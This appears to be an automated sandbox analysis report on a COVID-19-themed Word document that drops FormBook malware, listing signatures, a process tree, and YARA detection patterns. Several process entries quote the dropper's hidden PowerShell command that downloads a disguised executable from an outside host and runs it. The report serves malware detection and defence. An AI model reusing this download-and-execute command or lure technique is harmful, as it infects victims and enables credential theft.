Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19 FUNDING ELIGIBILITY FORM.doc

Overview

General Information

Sample Name:COVID-19 FUNDING ELIGIBILITY FORM.doc
MD5:97c74a10726fd4981d3203de43dcc2a2
SHA1:432da6985222f9ace31eb15b2bef03d56f4df846
SHA256:1b410bc2457fe408e14aa1d0770feb9d2c2d59c0546118aad108071cf57c45ca

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected FormBook
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects files into Windows application
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Adds / modifies Windows certificates
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7
  • WINWORD.EXE (PID: 3804 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
    • powershell.exe (PID: 3936 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • COGRANT.exe (PID: 1968 cmdline: 'C:\Users\user\AppData\Roaming\COGRANT.exe' MD5: 7AFD0EF7DA1C3D93B5FAAFEB89FFAA15)
    • powershell.exe (PID: 3952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • FLTLDR.EXE (PID: 3980 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: 92E7D4655C629754D2366E67E68A32F9)
    • powershell.exe (PID: 2160 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • COGRANT.exe (PID: 2196 cmdline: 'C:\Users\user\AppData\Roaming\COGRANT.exe' MD5: 7AFD0EF7DA1C3D93B5FAAFEB89FFAA15)
    • verclsid.exe (PID: 2280 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 42B2A7CBD7838214EECE6B6455C34BC6)
    • notepad.exe (PID: 2312 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\Abctfhghghghgh .scT' MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\COGRANT.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Roaming\COGRANT.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x640cd:$sqlite3step: 68 34 1C 7B E1
    • 0x641fa:$sqlite3step: 68 34 1C 7B E1
    • 0x64199:$sqlite3text: 68 38 2A 90 C5
    • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
    • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
    • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C
    C:\Users\user\AppData\Roaming\COGRANT.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x49082:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x49328:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x5ee2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x5e71a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x5f90a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x5f7b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x5d03e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x4c84a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x68f56:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x6a3a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KW1NULI9\9Pnzw[1].jpgJoeSecurity_FormBookYara detected FormBookJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KW1NULI9\9Pnzw[1].jpgFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x640cd:$sqlite3step: 68 34 1C 7B E1
      • 0x641fa:$sqlite3step: 68 34 1C 7B E1
      • 0x64199:$sqlite3text: 68 38 2A 90 C5
      • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
      • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
      • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000007.00000002.709409227.010A2000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000007.00000002.709409227.010A2000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x63ecd:$sqlite3step: 68 34 1C 7B E1
        • 0x63ffa:$sqlite3step: 68 34 1C 7B E1
        • 0x63f99:$sqlite3text: 68 38 2A 90 C5
        • 0x64a9b:$sqlite3text: 68 38 2A 90 C5
        • 0x63fac:$sqlite3blob: 68 53 D8 7F 8C
        • 0x64ab1:$sqlite3blob: 68 53 D8 7F 8C
        00000007.00000002.709409227.010A2000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x48e82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x49128:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x5ec2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x5e51a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x5f70a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x5f5b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x5ce3e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x4c64a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x68d56:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x6a1a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0000000A.00000002.708480545.010A2000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          0000000A.00000002.708480545.010A2000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x63ecd:$sqlite3step: 68 34 1C 7B E1
          • 0x63ffa:$sqlite3step: 68 34 1C 7B E1
          • 0x63f99:$sqlite3text: 68 38 2A 90 C5
          • 0x64a9b:$sqlite3text: 68 38 2A 90 C5
          • 0x63fac:$sqlite3blob: 68 53 D8 7F 8C
          • 0x64ab1:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.0.COGRANT.exe.10a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            7.0.COGRANT.exe.10a0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x640cd:$sqlite3step: 68 34 1C 7B E1
            • 0x641fa:$sqlite3step: 68 34 1C 7B E1
            • 0x64199:$sqlite3text: 68 38 2A 90 C5
            • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
            • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
            • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C
            7.0.COGRANT.exe.10a0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x49082:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x49328:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x5ee2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x5e71a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x5f90a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x5f7b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x5d03e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x4c84a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x68f56:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x6a3a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            10.0.COGRANT.exe.10a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              10.0.COGRANT.exe.10a0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x640cd:$sqlite3step: 68 34 1C 7B E1
              • 0x641fa:$sqlite3step: 68 34 1C 7B E1
              • 0x64199:$sqlite3text: 68 38 2A 90 C5
              • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
              • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
              • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 7 entries

              Sigma Overview